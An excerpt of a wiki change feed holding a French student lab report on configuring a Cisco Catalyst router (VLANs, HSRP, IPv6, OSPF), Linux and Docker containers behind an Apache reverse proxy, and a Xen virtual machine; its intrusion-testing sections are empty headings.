 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir de '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 (avec IPv6) =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  ipv6 router rip tpima5sc&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 et IPv6) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  no int vlan 131&lt;br /&gt;
  int vlan 131&lt;br /&gt;
   ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification avec Google.com =====&lt;br /&gt;
&lt;br /&gt;
On récupère une IPv6 de google avec la commande &amp;lt;code&amp;gt;host&amp;lt;/code&amp;gt; depuis une zabeth puis on tente depuis le routeur de ping cette adresse&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping v6 google.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== 4 Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== 4.1 Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== 4.2 Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== 4.3 Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== 4.4 Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== 5 Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== 5.1 Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== 5.2 Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== 5.3 Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49112</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49112"/>
				<updated>2018-12-21T15:43:49Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Services Internet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
